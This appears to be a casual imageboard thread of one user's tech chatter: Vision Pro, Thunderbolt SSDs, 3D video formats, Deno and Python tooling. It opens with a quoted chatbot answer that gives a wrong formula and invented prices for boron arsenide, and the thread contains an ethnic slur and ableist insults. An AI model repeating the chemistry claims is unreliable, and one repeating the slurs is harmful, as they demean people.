>Boron Arsenide (B_3N_2) is a relatively rare and complex material to produce. There is no straightforward answer to how much a one-liter block of Boron Arsenide would cost, as its price can vary significantly depending on several factors such as:
>Production method: Boron Arsenide can be produced through various methods, including chemical vapor deposition (CVD), molecular beam epitaxy (MBE), or solid-state reactions. The production method used can greatly influence the cost of the material.
>Purity level: High-purity Boron Arsenide is more expensive than lower purity grades due to the additional processing required to achieve higher purity levels.
>Quantity produced: Larger quantities of Boron Arsenide are generally less expensive per unit volume than smaller quantities due to economies of scale in production.
>Availability: The availability and location of Boron Arsenide can also impact its price. For example, if there is a high demand for the material in a particular region or industry, the cost may be higher due to supply constraints.
>Based on information available from various sources, the estimated cost range for high-purity Boron Arsenide powder is between $100 and $500 per gram ($32,000 to $160,000 per kilogram or $14,800 to $72,200 per liter). However, this cost range should be considered as approximate and may not reflect the current market price. It is recommended that you contact a reputable Boron Arsenide supplier for up-to-date pricing information.
not that i know if any of this is correct but
>Based on information available from various sources, the estimated cost range for high-purity Boron Arsenide powder is between $100 and $500 per gram
it probably hallucinated it, right?
but it still tried because chatgpt said nothing useful at all
maybe the only useful model is paid gpt4 now. but 3.5 is good for programming topics, either they are easier for machines or I'm dumb at them
>Mistral 7B is a 7.3B parameter model that:
>Outperforms Llama 2 13B on all benchmarks
>Outperforms Llama 1 34B on many benchmarks
interesting we just need an llm assistant that also contacts the mystery people for a real quote
makes sense. apple just added useless gimmicks to make them look cool
the absolute state of technology nowadays
jobs at least bought some real patents before making iphone
>they're good at what they're arguably
>the best at is taking a product that
>other companies have done or tried but
>and then package it into a form factor
>that's very usable and also very
>desirable for the normal consumer
that's kinda cool tho I can't stand half-assed software and devices. chinks are very good at it, they will pack millions of half-working features and sell for low price, but it fucking sucks and typical consumers can't see that because they have no taste
>make it socially acceptable and socially
>desirable so that now like right now if
>you saw someone wearing like a meta
>Quest 3 on the head on like an airplane
>it be like what is this guy doing right
>but I think in a few years time I think
>there will be headsets on air on flights
>I think people will be wearing Vision
>pros and other headsets
people with headsets in airplanes (for real) sounds a bit scary tbh
imagine an airplane full of people with helmets on their heads, how uncanny would it look like
it's interesting how every tuber bring that up, i guess they do internal flights in america so much that they really need to take advantage of that time in the air craxy
how is he allowed to repackage the youtube as an app
>Pretty cool that you can eat finger food while using Apple Vision Pro and go right back to controlling visionOS without having to wipe your hand/fingers down
I need it
I'm always eating with one hand behind TV because second must be clean for remote control
maybe there's some modern kinect out there for minority report ui into infrared commands
>It’s like a “monster,” Cook tells me. “An apparatus.” Cook’s told to take a seat, and this massive, monstrous machine is placed around his face. It’s crude, like a giant box, and it’s got screens in it, half a dozen of them layered on top of each other, and cameras sticking out like whiskers. “You weren’t really wearing it at that time,” he tells me. “It wasn’t wearable by any means of the imagination.” And it’s whirring, with big fans—a steady, deep humming sound—on both sides of his face. And this apparatus has these wires coming out of it that sinuate all over the floor and stretch into another room, where they’re connected to a supercomputer, and then buttons are pressed and lights go on and the CPU and GPU start pulsating at billions of cycles per second and…Tim Cook is on the moon!
>To put that into perspective, the average 4K television has around 8 million pixels.
those journalists
it can't be non 8 million pixels if it's 4K, what did they mean by "average tv"
do you think kpop idiols would advertise vision pro like they advertised airpods max?
luckily you can't carry it around as a fashion statement so we should be okay
Natty is team Sony?
people in reviews for SSD/TB adapters advice to enable "write-caching policy" on Windows, but that way you would measure RAM speed instead of SSD speed
wtf, now I'm not so sure I will receive good one
hope I would be able to return it if speed is like 1500MB/s or even worse
found chip for this one
but dunno what's the chip for the orico's devices
probably JHL7440
oh no
I think I can buy this asmedia one and then just don't recive the orico
ok, fuck it, bought the one with better asmedia chip
it even has nice TB4 cable for free
I became too impulsive with my tech purchases
now I want fast 4TB SSD for that cool enclosure
the first non-disgusting woman news presenter on modern american TV
her reactions are girlish, and not those horrible SJW ones
it's going to be amazing buying nbidia shield or chromecast instead of the trusted applel tv
you can even install .apk on apple tv
another obstacle defeated with chromenim's unloaded(?) tabs and puppeteer
i can only defeat one obstacle per day
I like the idea is that AR is just a bunch of dashboards all over the place
makes perfect sense. they built tons of big expensive screens and custom equipment in places like NASA to control complicated processes, but in theory you can replace all of it with just single headset
it was possible for years in meta quest 1/2 tho?
but somehow people are more excited only when apples does that
>Right now the video player is just a web view
cool app bro
>YT premium pays creators more than normal per view
wtf, I'm a valuable youtube viewer now
>You can actually lay on your sofa and put the displays on your ceiling if you wish,” Cook told me. “I watched the third season of [Ted] Lasso on my ceiling and it was unbelievable!”
so working from home is even more convenient now
>There are plenty of quirks using the device. One of my favorites is when you use the Vision Pro in one room and then go to another, open the same app, and you have to find it by looking all around the room; sometimes it’s on the ceiling or the floor. I couldn’t find my text app the other day and turned around to find it was in my bathroom.
it's real
so you can just have gigaLightNing↔USB-C adapter and connect it to a proper 30Ah power bank
>compatible_brands: isomiso4
>compatible_brands: isomiso2mp41
fucking mp4, how do you work
I will be able to move all my old webms to the external SSD soon, without worrying about my internal SSD free space
that guy is kinda ok, loves to dig into tiny details. like a not so stupid version of Linus, tho he is often too clickbaity
external PCIe connector sounds interesting
but TB4 is good enough and TB5 will be even better
can't wait to receive my TB4 SSD enclosure to get full SSD speed
$400 for 4TB is a bit expensive
basically $100 per TB
but still much cheaper than apple's internal ssd prices
I don't need 7GB/s tho, what about some cheap 4GB/s one
>I recently bought a Crucial P3 Plus NVMe SSD and sequential read performance seems to be inexplicably lower than expected (~2GB/s instead of 4GB/s).
>Hadn't tried others, just the built-in one, winsat. CrystalDiskMark is reporting speeds as fast as I expected for sequential reads, about 4.9GB/sec. Looks like this might be an issue specifically with winsat
>go caches your
go get github/repo/owner@master
commandsfucking idiots, what's the point of adding tons of hidden features which only spend your time on debugging various issues with them
worst language ever new configuration language by apple >>1025800 is out
>and receive code generation for Java, Kotlin, Swift, and Go.
what about Python, Rust and JavaScript
typed configs with constraints is a bit interesting tbh
people usually fix configs in editors, then run program, then check the behavior
but you could write config in typed language like typescript if you really wanted that tbh
whatever schema thing vscode has for json is cool
"json.schemas": [ { "fileMatch": ["manifest.json"], "url": "" } ]
oh yeah, json schema is like
file from javascript moduleworks very nice in editor like VSCode, so no real need for another thing
can you generate json schema from the TypeScript options module tho? e.g.
export interface Opts { name: string; port: number } const opts: Opts = { name: "123", port: 456 } export default opts;
so that you don't need to duplicate Opts definition
I had to crf=35 that but it's still enormous bitrate
also encoding speed for 4K60p isn't that great even on preset=10 anymore
same as in original VP9 file tho
Duration: 00:03:26.55, start: 0.000000, bitrate: 23482 kb/s
encoding 4s
4K60 speed=0.243x 16.657s
4K30 speed=0.326x 12.397s
2K60 speed=0.576x 7.058s
2K30 speed=0.753x 5.402s
this file is too slow even on 1080p30
닝닝 와이푸
I really like this guy's way of telling you information
very precise and dense
even he abandoned his stuff
SE:Lain predicted the future
so apple actually cheated
meta quest is cheap but only vision pro allows you to use your headset as your phone without using your phone (calls, text messages, all other apps, etc)
meta simply doesn't have that day to day apps
the only problem is that you can use apps while you're walking
me in 3 years
>Let people have their enjoyment with the VP, because come the next few weeks, you'll see less and less people wearing them in public as the novelty wears off.
>This. Just like any other vr devices. Honeymoon period is very real lol
tbh I want that trend to continue, I can't stand being disconnected from the internet during walk
some people with vision problems are really good at using computers or fones by only hearing
i wonder how much practice you need to get there but then youd just need a smal computer and earphones
not sure what the best way to input would be when walking though does an air split keyboard exist
>does an air split keyboard exist
you mean something like small keyboard on your hand, like in apple watch?
that's not ideal because it's hard to walk forward and keep an eye on your wrist at the same time
I dunno how to make non-qwerty small keyboard which you can blind typing
getting feedback inside your phones is interesting idea tho
still can't transmit too much information via ear channel unfortunately, entropy-nim won't let you
I knew somebody was thinking about that too
need an air guitar version of this
maybe like a glove that somehow recognises key presses and also how stretched your finger is to see if its home row or up or down
when i'm outside i usually type something in the air like those typewritist serial killers from the telly
>when i'm outside i usually type something in the air
there are concepts like
but I guess they suck so no adoption
maybe Vision Pro will change that because default input methods clearly aren't good enough
idk just a habit
i just keep writing some word like ㅌㅐㅇㅕㄴ ㅌㅐㅇㅕㄴ ㅌㅐㅇㅕㄴ
i write korean on the condensation on the glass in the shower sometimes
the fucks are those spells he says
seems kinda like vi commands for your voice
that mypy is such a retarded pabo tbh
you normally want to use
andMapping[T, T]
instead to make it accept generic types. it doesn't work with list/dict for some dumb reasontypescript is so much better
geez, they don't even have JIT in cpython but it's still one of the most popular languages because of tons of hacks on top (which are shit, that's why creator of LLVM made Mojo)
hate to admit, but python is worse than javascript
>vi commands for your voice
>In October 2017, the City of Honolulu, Hawaii introduced a measure to fine pedestrians looking at smartphones while crossing the road
instead of seeking for solution, they fight symptoms
youtube keeps refreshing the recommendations page when I open the video and then go back
like I open youtube, have 3 very cool videos on the front page. open first, watch it for some time.
then go back but then the page is suddenly refreshed and 2 very cool videos I wanted to watch are gone now
and of course I don't remember their titles so can't find
the only solution is to instantly add everything to "watch later" but that's a bit inconvenient
i have 2676 videos in watch later
I'm 569
I used to delete watched ones but then decided it's more useful to keep them
people on imageboard ignore your thread
people on reddit ignore your post
people on discord ignore your message
what's the best way to receive many different opinions on your questions?
asked chatgpt, it answered some useless rubbish
maybe need to try mistral
by formulating them as confident claims instead. then people will try to prove you wrong.
that might work
but I'm too shy for that
i used to dream of a stackoverflow type of place you could post a question with some money as reward for answer, and take out the need for having a reputation before people bother answering.
i think at some point paid someone a few bucks to attach an upvotes reward to a windows sdk question holy shit (yes it got answered)
another time i asked without upboat bounty and windows main man raymond chen answered
I'm always jealous about reddit threads which receive tons of different answers, from multiple different perspectives. you read all of that and construct better world view thanks to it. but my questions usually aren't successful enough
>an upvotes reward to a windows sdk question
?I don't even know who should I pay to, to get answers which would satisfy my curiosity urge. maybe should just spam them more
stackoverflow, i paid someone on like fiver or something i think
other alternative is answering and posting stuff and building up those upboats over time to join the upper class people
unfortunately there's no stackexchange site for the questions I want to ask
all technical kind of questions are usually easy to find or solve by yourself, never had problem with that
>alternative is answering and posting stuff
my answer at korean stackexhcnage got a huge success but at superuser no one even noticed even tho it was a correct one
btw in the future due to gpt spam its only the upper class people who will continue to be able to post on various interwebs websites, so its not a bad idea to start those personal brands on ribbit, stackoverflow, hackers news and whatnot
personally im too autistic thinking of laws of entropy, at 20 questions i would probably be personally identifiable due to releasing too many bits of personal interests in a combination noone else would have at least i think that becuase retard
>btw in the future due to gpt spam its only the upper class people who will continue to be able to post on various interwebs websites
I thought you would just need to scan your iris
>Worldcoin hopes to provide a reliable way to authenticate humans online called World ID, to counter bots and fake virtual identities facilitated by artificial intelligence
>at 20 questions i would probably be personally identifiable due to releasing too many bits of personal interests in a combination noone else would have
I think the same tbh but in big communities no one would notice (unless with math/algorithms)
in small communities that's a problem yeah
>i would probably be personally identifiable
there was this girl that i knew from a group chat that i randomly came across in another unrelated community for korean learning a few years after i last saw her.
also on hackers news theres sometimes demonstrations of people finding other people's alt accounts just by their writing style (sort of similar to how you sometimes recognise people on kchan )
kinda scary, sort of similar to chinese cctvs identifying people from their gait
>chinese cctvs identifying people from their gait
>finding other people's alt accounts just by their writing style
forensic linguistics lol
that shit doesn't work when it needs to
people can't find fucking creator of Bitcoin, have they even tried?
well it looks like there's a paper claiming Nick Szabo the pabo is most likely the guy so yeah they've tried. don't know that guy, i have no opinion.
but no one agrees on this. seems like that method isn't reliable at all
it was never meant to be a conclusive method that ends all suspicion. it's not dna evidence. there's often only so much you can extract anyway. sometimes you just narrow down the demographic. you're lucky if you can even absolve someone. there's not much of a reason to trust an analysis that preemptively decides to do an analysis to single out 1 person.
maybe, but that's just very rewarding task it could shine at. and no, nothing, no one have any idea who Satoshi truly is, besides tons of speculations
it would be pretty cool. sometimes forensic linguistics can be like fishing, and sometimes there's just not any fish in the water. gotta change your approach too if the person changed their writing style to hide their identity.
>and just a quick
here to change the format>wait, this one thing returns a result
nnoooo i dont remember how try_collect works back to the trusted for loop we go
oh yeah, those chains where you have to fight with unknowns/errors/borrow checker are quite bad, even worse than pure functions in Haskell because there is GC in Haskell
>HomePod and Apple TV are exceptions. They failed to dominate the market even after several revisions.
oh no, Apple isn't always winning
>i dont remember how try_collect works
can copilot help you with it? it should be quite good with creating unreadable code mess no one can understand
whats the technology here its not just gyroscopes surely or some ladar mapping since it "works" when the subway starts moving too
>If you needed evidence that Vision Pro was designed in a country where public transport isn’t big, here you go: it’s not great on a train. Throws up tracking failures about once a minute even in travel mode.
basically the only confirmation that 10bit av1 works on fresh apple chips is that?
no one tells which exact profiles are supported, just "av1"
>AV1 defines three profiles for decoders which are Main, High, and Professional. The Main profile allows for a bit depth of 8 or 10 bits per sample
probably just Main but you probably can't do just 8bit Main even if you're Apple, that would be a violation of the standard
no info about High/Professional tho
why are those videos where speaker tells useless stuff for 80% of the time is still a thing
what's the point of sitting in the audience and listening to stupid jokes and random stuff you aren't interested in such a waste of time
can we somehow optimize videos at conferences and force them to only speak on the topic?
on the other hand, there're so many random facts around that if you listen to many such videos, you will collect a lot of facts which you will be probably able to apply to your work later
on the third hand, we aren't ChatGPT@Azure and can't process millions of hours of videos, so it's better to focus on better signal/noise sources of information
also 23 is for both eyes, so 11.5 per eye, so only a bit more than 2x4K displays
>Apple engineers didn’t slice off a rectangle from the corner of a 4K display and put it in the Apple Vision Pro. They somehow compressed twice as many pixels into a space as small as your eyeball.
why comparing with 75" 4K TV when 4K 6" smartphones is a thing?
stupid journalists
most people can't sit through 100% information
it's easier to follow if it's less dense, even if the total amount of information is the same
one of the most painful content on youtube is medical procedures with people with skin problems
it's so disgusting but you can't not click and youtube considers it as SFW content and of course recommends that to random viewer because algorithm says it's working well
our psychology is fucked
you mean the "live a happy life" or something titled vid
yeah for some reason koreans really like it so its recommended a lot alongside kpop videos
yeah, exactly that one
>koreans really like it so its recommended a lot alongside kpop videos
I see
I thought it's my weird watch history but actually just because of kpop videos
>koreans really like it
weird people
TIL americans have two types of glasses: reading and prescription
tons of cool vision pro content on youtube
I also can't understand how Game of Thrones is so popular. it's so disgusting yet almost every normie watched and liked it
we are truly cruel species
kernel panic on vision os
when you gotta order some timely stuff and already over free shipping limit but nothing comes to mind suppose i dont need anything
I have so many ideas of cool electronics to buy but don't want to spend too much money on toys
will buy them gradually once per few months
was gonna pick a gpu today but them still being 200W+ space heaters bummed me out enough to make me do something else
which one?
didn't end up picking one, like i said
very smart way of trolling, and very hard to ban globally because it's sfw
how would platforms react to it if goes big
>browsing apps while walking
if only you could make them follow you automatically and typing experience was better
I was dreaming about that for years, please make it happen
imagine walking around the city and posting at kch at the same time
>"oppa can you take the glasses off for a while~"
>takes them off
>yuri disappears
>I still have my Ning waifu on VR lenses
also I wanted to buy just regular iphone 15, but that has to be at least 15 pro because regular 15 doesn't have AV1 decoding
but it also has inferior battery life so why not go with even more expensive 15 pro max or just wait for iphone 16? fucking apple,Apple-iPhone-15-Pro-Max/phones/10001,11930bruv ryan
not bad
hopefully bundling situation clears up at some point i want to use deno there
i probably cant use unbundled files for a browser extension heinemeier hanson style or can i
>A key factor in these performance gains is the improved integration of Deno’s HTTP interfaces with the Hyper and Reqwest libraries.
so i guess for the javascript vm they use v8 but everything else is rust tokio
saw a good deal for 15 pro
$1055and bought itam I pabo? pabo...
but the deal is very good tbh, I can't see such prices
in the available shop for meeven for 14 prohope I won't get scammed
>for a fone
the official excuse is that I would be able to experiment with AV1 on it
the realistic:
>so i guess for the javascript vm they use v8 but everything else is rust tokio
yeah of course, there's no other good JS JIT (Firefox/Safari's aren't bad either, but V8 is also more popular)
Rust in Deno is replacement for libuv in nodejs, for OS-related API such as dealing with files and network
>i want to use deno there
>unbundled files for a browser extension
for extension you provide just JS files, you don't need native binary. it won't even accept it because insecure except WASM
now also need new airpods pro with usb-c
and magic keyboard with usb-c
and some cool powerful qi-2 powerbank
and the case of course
why is everything so expensive
will I become as smart as Carmack if I'm eating pizza every day too
cursor breaks in chrome every few hours now
wonder if you can embed some deno stuff in a rust program
python is easy with pyo3 but deno/typescript might get a little bit too mysterious what with typescript compilation (if needed) and third party modules
guess for now i'll just keep using deno as a subprocess and then reading stdout like a dumbo
you can use native modules in deno instead
i.e. not call deno from rust, but rust from deno
>3 days ago
>Let's keep reporting this until they fix it.
i guess thats what most people want to do so its hard to google the other way around
but at least 1 person knows what i'm talking about not less painful than std::process::Command yet tho
it's just weird architecture
if you need it for the puppeteer thing then can just use subprocess and return JSON result, I sometimes do that too when too lazy to e.g. port python opencv code to other language
deeper integration would be too complicated and weird anyway
pyo3 is comfy as heck for ytdl what can you do
weird, why not just
yt-dlp -J
anyway it's simpler for python/lua because no event loop normally
imagine dealing with JS weird async stuff in Rust code
this guy's job is to unpack stuff and film that on video and he's kinda good at it>Defaults Matter
team #defaults
>mfw I've seen website
I've used flask from this guy (which was quite bad tbh but ok for the time) ages ago
>Linting and Formatting: it bundles ruff and makes it available with rye lint and rye fmt
go started that stuff, right? though we had that in Rust (cargo) at around the same time
>A hassle-free experience for Python developers at every level.
don't remember any hassles in Python except the fact that CPython is slow as fuck and mypy is shit
we are team Mojo now
#feel the MLIR
>Locking and Dependency Installation: is today implemented by using unearth and pip-tools.
python is even worse with dependency management than nodejs world (with just npm, yarn and pnpm options)
geez, just stick to one thing, stop reinventing the wheel for the simplest task
we all knew Guido is retarded because he created the Python2/3 situation, which was barely solved
but he's just truly incompetent, he keeps killing Python because can't learn from other ecosystems around, only relying on community
fuck that shitty messy ecosystem made by amateurs and scientists who can't fucking code, I'm switching to Mojo once it's ready enough
so did he just copy Ryan with his Deno?
but he forgot one important ingredient: the type system
mypy fucking sucks
the most complicated question in the universe: to use the case or not
stupid machine
if the back of the fone is flush dont use it
if there is a camera bump no choice but to use it otherwise its clink clank everytime you put it on a table
>if there is a camera bump no choice but to use it otherwise its clink clank everytime you put it on a table
what if I use that thing (already bought before)
but I don't like it much tbh
but case still feels worse because it's stupid
it's clink clank even with a case in new models btw
also I read that camera glass is pretty strong so not an issue if it hits wooden table
but feels icky of course
for some stupid reason apple doesn't make it flat anymore
>Convince me to not use phone case
damn guess it would be way to fat if it was flush
interesting strategy
unfortunately I still constantly doubt my decisions anyway
life is too hard if you're
just don't be a phone-dropping pabo. I have never cracked my screen
same, but the more time passing, the more you start being worried because that's how probability laws work, right?
I only started dropping my remote control for TV accidentally because I don't care anymore tbh, it's pretty old
i use one so i can chuck my phone in the same pocket as my knife and keys without worrying
I have separate pocket for a phone
>In my old 4/5s days I did this didn’t worry as much at all. In fact before then all phones I had were case-less..
>I dropped my 7 Plus and it crippled me to be honest; tried to fix it on the cheap as the screen was cracked battery dead all the time and they did a terrible job so I ended yo having to fork out for a new phone.
>Ever since it’s been a case and screen protector all the way. I love the phone without a case, but now I just think it’s £1000 down the toilet if I drop it accidentally. At least a case prevents that chance of damage a little.
the incident crippled the lilbro
you're brave and confident only until life kicks you hard enough, right
>checked spam folder
>gmail put few absolutely valid emails there
>now thinking how many of them could I already miss
they cancelled my order
few more years with current phone then
why live if I can't even buy tech toys
stupid world killed all my motivation
>Dead Internet Theory: Most Of The Internet Is Fake
>"most" meaning I saw some content created by bots here and there and came to wrong conclusion
need to read that
>A physicist has proposed the provocative idea that life exists because the law of increasing entropy drives matter to acquire life-like physical properties
>The new Null[T] type provide a way to scan nullable columns for any column types.
are we back
it takes 4 day for a refund
why does everything work so badly
started reading another book, much better
const SERVER_URL = Deno.env.get("SERVER_URL"); if (!SERVER_URL) { throw new Error("Missing SERVER_URL"); } async function run() { fetch(SERVER_URL); } // Argument of type 'string | undefined' is not assignable to parameter of type 'RequestInfo | URL'.
import { z } from "zod"; const SERVER_URL = z.string().parse(Deno.env.get("SERVER_URL")); async function run() { fetch(SERVER_URL); }
I think that's because function is hoisted, so your code is equivalent to pic
and it's not too smart to figure it out. or maybe for performance reasons
buy vision pro and girls will start noticing you
>what's in my tech bag
based or cringe?
notice you for the cringe
10 minutes to download 4K bdremux on 1gbps uplink
why so slow, I need at least 10gbps
8K VVC blurays when
although 8K/4K is already UHD
need 32K/16K super hd or something
why is the grass always greener on the other side
maybe because it's true?
just one more week and it won't be trendy anymore
should I use Resolve or Final Cut for editing videos?
not sure I want to edit something at all but maybe will try one day, since I have best os for video editing anyway
resolve is free, but seems like final cut has better integration and you can reset trial multiple times?
but then what if you can't reset it anymore some day and too used to final cut
he said 2x24" is about the same experience and plus you don't have sweaty forehead
that's what I was thinking too. can't fool the physics, vision pro is finito
kinda funny with the final revelation of coming back from the dark vision pro world into the bright colorful real one
enjoy the real world
your video?
const param = "123" const regex = new RegExp(`^https:\/\/\/page\?param=${param}$`)
assert(url.match(regex)) // error: AssertionError
console.log(regex) // /^https:\/\/\/page?param=123$/
const regex = new RegExp(`^https:\/\/\/page\\?param=${param}$`)
나 좀 바보인가봐 갑자기 기억났어요. 내가 주소를 잘못 적은 거예요
or just for this case it's simply
back then computer jobs were mostly data entry
it's over, now it's $90 more expensive
but I still want to buy it
but I don't really need it
what do
dont buy it so you have something to wait for in september
it's still 7 months till september
and what would we have there? iphone 16 same as iphone 15?
although iphone 16 will probably have av1
but now I want always on and 120hz too
>Larger 6.3" and 6.9" Sizes for Pro
>New "capture" button
>Action button for all iPhone 16 models
>Periscope zoom lens
>Faster A-series chip
>Wi-Fi 7
maybe I need to wait for wifi7
but then wait 7 months + few months for some minor sale would be too much
I don't need new phone right now but I need to fulfill my urge for the tech toys... maybe buy some other toy instead
>wait for wifi7 with 320mhz channel which will probaby have at least 2x2882 = 5764 phy rate ~ 3.7gpbz real speed
oh, I want that
just imagine moving at 3.7gbps speed bdremux movies around
but it would be hard to wait so much more, I'm tired of my stupid old phone
meanwhile thunderbolt 40gpbs is laughing at you
actually around 3.8GBps ~ 30gbps
but still very good
but I want both wifi7 and thunderbolt ssd
maybe 10gbps network too, after wifi7
and I don't have that many ports on macbook, will need also thunderbolt dock
10gbps network seems slow nowadays, right?
3.7gbps wireless airdrop or 10gbps wired usb3 file transfer?
>not 4K
>4K TVs aren't 4K
fucken idiots, what are they talking about
how would AI button be called on macbook?
>author = {Tsu-Jui Fu and Wenze Hu and Xianzhi Du and William Yang Wang and Yinfei Yang, and Zhe Gan}
all of them are chinese right
why didn't they use 3nm M3 instead
v1 is just a devkit for developers to get the app ecosystem going apfel is banking on someone figuring out the killa app or angle to move toward
>someone figuring out the killa app
can't fool the physics tho. it's way too uncomfortable to use it more than few hours per day
and why would you buy expensive device which you barely use
>Stream #0:3(eng): Subtitle: dvd_subtitle, 720x480 (default)
can AppleTV play those? (bitmap subs)
my SmartTV can't and it's huge pain when downloading stuff from avistaz because they can't into proper srt/ass subs
i can test if you want (paid app tho infuse)
here on 1:05
(I tried to cut it better but timestamps are too brittle with
-c copy
should be like that with and without the subs
yeah werks on infuse at least
appletv wins
it says vobsub (bitmap subs for dvd) and pgs (bitmap subs for blurays) are supported here, cool
what about hi10p stupid anime files tho?
>when downloading stuff from avistaz
also with BDRemux they don't always have srt subs embedded, often PGS
so you can either have quality or subs
>The Vision Pro battery pack can be opened without damaging the external metal. There’s a YouTuber named “phone repair guru” who was able to open the battery pack without damaging the case using acetone to dissolve one layer of adhesive and then using a pry tool to open it
fucking incompetent retards working at ifixit now
they also deleted my comment where I said that they are wrong
those are some tiny displays
maybe you could fit a smol display to the corner of some glasses or sunglasses and not have to learn how to read code by voice afterall or maybe use the other lens completely as a display and use other eye to see i wonder if that would work
apparently vr glasses trick eyes to believe objects are far away so the eyes focus far, use that to match focus with seeing eye
>maybe you could fit a smol display to the corner of some glasses or sunglasses and not have to learn how to read code by voice afterall
the apple vr goggles don't prevent you from using a keyboard either
got new macos and chrome update, will it fix the cursor problem
spatial video is just HEVC MVC
I need iphone 15 pro and Vision Pro for experiments badly now
would you be able to tell a big difference on the tiny screen
you can watch spatial videos captured on iphone 15 pro in a vision pro headset
I just suddenly found out how they're encoded
now I want new iphone even more to experiment with that 3d thing
who could believe that apple will bring 3d movies/videos back?
oh i get it now
checked porn vr 3d, it seems most are encoded as Side by Side 3D (i.e. just two frames stiched together horizontally), not MVC
lol what player is that? can't see. but seems not mpv or vlc or quicktime
bluray 3d are mvc too
and stupid quest can't even play mvc
it may turn into something very interesting if I'm lucky enough
or maybe not
that's a lot of info
finally I will be able to understand how that cool 3d stuff works if everything goes right
>MPEG-4 AVC Video 28093 kbps / 34375 kbps Left Eye / 1080p / 23.976 fps / 16:9 / High Profile 4.1
>MPEG-4 MVC Video 13805 kbps / 14405 kbps Right Eye
why is it h.264 not hevc
there are only h.264 3d blurays exist
>Using Dolby Vision and Multiview High Efficiency Video Coding (MV-HEVC), 3D movies on Disney+ will deliver exceptional UHD resolution in HDR, unfiltered and independent for each eye, and at a high frame rate for several titles – ensuring that the filmmakers’ creative intent is fully preserved and reflected.
where to download that????
is hevc bluray even a thing
wouldnt it need a totally new name a basic bluray surely cannot play some fancy new encoding format
yeah, uhd blurays
oh its a new name
>You'll only be able to access Disney's 3D films using Apple Vision Pro.
I can't believe no one found a way how to download those
I can't believe sony did shit, meta did shit and only apple released overpriced stupid headset which can do some serious stuff like UHD 3D movies
how do they do that: being greedy fucking lazy bastards but still delivering good stuff is obsolete?
>video compression standard finalized on 6 July 2020
I thought it's still in the draft, interesting
need to check comparison with AV1
how about 8K VVC HDR DV 3D?
anyone else gocurious?
froze the whole system by mounting ISO from the network SMB volume
had to restart
512GB may be not enough for experiments with 3D/UHD blurays
hopefully TB SSD enclosure arriving soon
I'm getting only 60MiB/s when copying file from local ISO+UDF on ssd
on linux it's much faster
I froze it again fucking useless macos can't do simplest shit, even with local iso
need to try to mount it via docker if macos such shit
why do I have to restart because of incompetent macos developers
docker run --privileged=true --rm -it -v $PWD:/shr ubuntu:23.10 mount -o loop /shr/avatar-d1.iso /mnt cat /mnt/BDMV/STREAM/00000.m2ts | pv > /shr/00000.m2ts
not great, not terrible
what if I can mount it from docker to shared folder tho, without copy
150MiB/s on Linux on SATA SSD
maybe macos isn't that bad
but only with the help of Docker
>what if I can mount it from docker to shared folder tho
they aren't visible inside macos then
>the siff file is the same size as the left and right eye m2ts streams combined, its kind of a red herring as it shares the same sectors on the disc as the m2ts files
the bd3d thing is interesting
>If you add the size of all M2TS and SSIF files, you will see that the total is much larger than the total size of the disc. (It's also why copying the files to HDD consumes much more disc space than an ISO: all 3D video files are copied twice.)
oh, maybe that's why macos didn't like that iso
almost got how it works
enough for today
so in MV-HEVC video for right eye is in the same track, just in additional box, not separate track/file
ssif sucka
>sony hdr-t10
>World's First Double Full HD 3D Consumer Camcorde
3d files aren't so complicated anymore
if only tools for working with ISOBMFF very simpler
>El_lici , I think the videos Apple are using to demo “family” recording are smoke & mirrors using standard camera panning in the 2D video. You might be able to enhance the disparity between L/R video streams with a depth mask, but I don’t think you will have the ability to see multiple parallax views (like a lenticular) from a single vantage point.
all those tools use intel media sdk to encode/decode H.264 MVC videos
and it even works on Linux
so first you need to demux SSIF into two m2ts files for left and right eye (compressed, right eye uses 2D plus Delta algorithm)
then decode them into two normal separate raw videos
>google Apple Foundation
do you want this
or this
no way
you can encode MV-HEVC on apple device just with few lines of code?
what software does Disney use to encode MV-HEVC tho
can't believe they use shitty Apple's hwenc
reference encoder for MV-HEVC
started reading across the NH_MV/NH_3D defines and it's a mess, they just replacing scalar variables with vectors of same type everywhere to store multiple layers
already tired
oh my god, it already exists
tried xcode, seems stupid and inconvenient after vscode
is there an easy way to rip video from a streaming service like easy easy maybe one of those mystery boxes that live streamers sometimes use to capture screen would something like that work
i don't need to capture 100% quality
yt-dlp? or streamlink maybe
sorry i mean paid streaming service so drm'd stuff
>so drm'd stuff
you mean something like Netflix in Edge? PlayReady?
I hate stupid forums which require moderator approval for post to appear
why do I have to wait
>You are not allowed to post or reply until you have been registered for at least 5 days.
but after you waited 5 days they still don't let you post
>I don't think XCode is exactly popular or viewed as anything other than necessary evil by many Swift app developers. Like a sibling comment mentioned, many people already use other IDEs to write the code and just use XCode to compile stuff because it is just so ass. Get the compiler invocation experience and maybe even the Apple Developer integration to a decent enough shape in a VS Code extension and XCode can start counting its days methinks.
need to read this
why did they think 2D fallback for the 3D content is such a cool idea?
didn't they end up selling 2D and 3D blurays separately?
who is that guy? someone famous?
nome memes are always good tho
I don't get it can't you make it work even in gnome with some file manager and some configuration such as ffmpegthumbnailer or something
another level of challenge is the nome file picker
its dogshit
madbro did it
political debate guy/news streamer
i wonder if being a libertarian makes you a lolicon or the other way around
i don't understand why file pickers exist at all
why not just spawn the regular file browser in a special mode?
>why not just spawn the regular file browser in a special mode?
isn't it almost like that in windows/macos?
the dialogs are a bit different but they reuse a lot of common look and most of functionality (and call same system API underneath)
>and stupid quest can't even play mvc
oh I found this
>The only player on the Meta Quest that supports MVC 3D decoding (Blu-ray 3D) and MV-HEVC decoding (Apple Spatial Video), plays movies and VR videos with 4x clarity.
interesting, what decoders do they use for that
>cn.vr4p.oculus4xvrplayerov.apk 250.10 MB
I can check it by myself
what if some snapdragon hwdec stuff tho
├── lib │ └── arm64-v8a │ ├── │ ├── │ ├── │ ├── │ ├── │ ├── │ ├── │ ├── │ ├── │ ├── │ ├── │ ├── │ ├── │ ├── │ ├── │ ├── │ └──
./ T _ZN11FFmpegMedia12CheckHaveMvcEP8AVPacket
is that it or maybe patched ffmpeg. no other ideas
ghidra nim is pretty cool
but I still have no idea how does the app decode MVC>speaker diarisation
automatic line breaks between characters, perhaps? outa try this
my post isn't shown yet on the forum
I lost all my motivation to post there at all
time for another ghidra round
why is that guy always so funny
